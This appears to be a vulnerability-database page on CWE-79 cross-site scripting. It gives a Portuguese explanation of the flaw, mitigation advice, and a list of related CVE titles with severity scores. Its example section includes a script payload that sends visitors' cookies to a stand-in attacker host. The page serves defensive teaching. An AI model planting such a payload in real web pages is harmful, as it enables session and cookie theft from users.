Fallos del tipo CWE-79

29.220 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-2792MEDIUMElementor Addon Elements <= 1.13.2 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via 'Text Separator' and 'Image Compare' WidgetEPSS 0.5%CVE-2025-64495HIGHOpen WebUI vulnerable to Stored DOM XSS via prompts when 'Insert Prompt as Rich Text' is enabled resulting in ATO/RCEEPSS 0.5%CVE-2023-51447MEDIUMDecidim vulnerable to cross-site scripting (XSS) in the dynamic file uploadsEPSS 0.5%CVE-2022-30679MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.5%CVE-2022-42345MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.5%CVE-2023-6737MEDIUMEnable Media Replace <= 4.1.4 - Reflected Cross-Site ScriptingEPSS 0.5%CVE-2025-12486HIGHHeimdall Data Database Proxy Cross-Site Scripting Remote Code Execution VulnerabilityEPSS 0.5%CVE-2022-42356MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.5%CVE-2022-42352MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.5%CVE-2022-35645MEDIUMIBM Maximo Asset Management cross-site scriptingEPSS 0.5%CVE-2025-55420HIGHA Reflected Cross Site Scripting (XSS) vulnerability was found in /index.php in FoxCMS v1.2.6. When a crafted script is sent via a GET requeEPSS 0.5%CVE-2024-41678MEDIUMGLPI has multiple reflected XSSEPSS 0.5%CVE-2023-2853MEDIUMXSS in SoftMed's SelfPatronEPSS 0.5%CVE-2024-2116MEDIUMChristmas Greetings <= 1.2.5 - Reflected Cross-Site ScriptingEPSS 0.5%CVE-2025-10546MEDIUMCross-Site Scripting (XSS) Vulnerability in PPC XPON ONT Wi-Fi RouterEPSS 0.5%CVE-2024-57423MEDIUMA Cross Site Scripting vulnerability in CloudClassroom-PHP Project v1.0 allows a remote attacker to execute arbitrary code via the exid paraEPSS 0.5%CVE-2026-47324MEDIUMStored XSS in Multiple Points in ProjectsAndPrograms school-management-systemEPSS 0.5%CVE-2024-10577MEDIUMFat Rat Collect <= 2.7.3 - Reflected Cross-Site ScriptingEPSS 0.5%CVE-2026-40607HIGHMantisBT is Vulnerable to Stored XSS Through its Saved-Filter Owner ColumnEPSS 0.5%CVE-2022-35695MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.5%